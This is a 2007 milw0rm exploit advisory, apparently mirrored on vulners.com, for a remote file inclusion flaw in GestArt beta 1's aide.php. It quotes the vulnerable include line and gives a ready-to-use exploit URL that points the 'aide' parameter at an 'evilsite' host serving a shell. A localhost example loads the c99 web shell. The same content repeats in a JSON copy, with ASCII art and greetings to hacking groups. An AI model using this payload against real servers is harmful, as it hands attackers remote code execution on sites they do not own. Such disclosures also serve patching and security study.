GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability:

2007-03-1400:00:00

vulners.com

                                                      .-&quot;&quot;&quot;&quot;&quot;&quot;&quot;&quot;-.                                 
                                                     /   Dj7xpl   &#92;                              
                                                    |              |                                
                                                    |,  .-.  .-.  ,|                                
                                                    | &#41;&#40;_o/  &#92;o_&#41;&#40; |                                     
                                                    |/     /&#92;     &#92;|                                 
                                          &#40;@_       &#40;_     ^^     _&#41;                  
                                     _     &#41; &#92;_______&#92;__|IIIIII|__/_______________________________
                                    &#40;_&#41;@8@8{}&lt;________|-&#92;IIIIII/-|________________________________&gt;
                                           &#41;_/        &#92;          / 
                                           &#40;@

+____Iranian Are The Best In World+

Portal : GestArt

Download : http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion

Author : Dj7xpl | [email protected]

Risk : High (Remote File Inclusion Exploit)

+_______________________________________________________________________________________________________________________+

±------------**************************************** aide.php*********************************************-----------+

<? include("$aide.txt");?> </p> <<<< line (21)

±------------***********************************************************************************************-----------+

+_______________________________________________________________________________________________________________________+

Exploit : http://[target]/[path]/aide.php?aide=http://evilsite/shell <<<< Shell (Text File)

Example : http://localhost/getart/aide.php?aide=http://localhost/c99 <<<< c99.txt

+_______________________________________________________________________________________________________________________+

Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …

+_______________________________________________________________________________________________________________________+

milw0rm.com [2007-03-13]

JSON

GestArt beta 1 &#40;aide.php aide&#41; Remote File Inclusion Vulnerability:

Portal : GestArt

Download : http://www.phpscripts-fr.net/scripts/scripts.php?cat=Gestion

Author : Dj7xpl | [email protected]

Risk : High (Remote File Inclusion Exploit)

<? include("$aide.txt");?> </p> <<<< line (21)

Exploit : http://[target]/[path]/aide.php?aide=http://evilsite/shell <<<< Shell (Text File)

Example : http://localhost/getart/aide.php?aide=http://localhost/c99 <<<< c99.txt

Sp Tnx : Milw0rm, Ashiyane, Delta Hacking, Virangar, Hacker.ir, Shabgard.org,Simorgh …

milw0rm.com [2007-03-13]

GestArt beta 1 (aide.php aide) Remote File Inclusion Vulnerability: